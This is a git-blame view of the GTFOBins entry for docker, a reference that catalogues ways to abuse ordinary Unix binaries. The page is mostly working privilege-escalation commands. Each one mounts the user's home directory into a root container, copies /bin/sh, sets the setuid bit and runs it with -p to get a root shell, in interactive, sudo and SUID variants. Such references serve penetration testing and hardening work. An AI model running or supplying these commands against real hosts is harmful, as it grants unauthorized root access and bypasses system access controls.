public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-10-23 00:57:56 +02:00
Code Issues Projects Releases Wiki Activity
f740b410cc
GTFOBins.github.io/_gtfobins/docker.md

20 lines
837 B
Markdown
Raw Normal View History

add new ways
2018-08-17 17:16:09 +02:00
---
Make docker disposable, use sh instead of bash and add description
2018-08-19 09:40:37 +02:00
description: |
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group.
This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.
add new ways
2018-08-17 17:16:09 +02:00
functions:
execute-interactive:
Make docker disposable, use sh instead of bash and add description
2018-08-19 09:40:37 +02:00
- code: |
docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
add new ways
2018-08-17 17:16:09 +02:00
sudo-enabled:
Make docker disposable, use sh instead of bash and add description
2018-08-19 09:40:37 +02:00
- code: |
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
suid-enabled:
- code: |
./docker run --rm -v /home/$USER:/h_docs ubuntu \
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
add new ways
2018-08-17 17:16:09 +02:00
---
Reference in New Issue Copy Permalink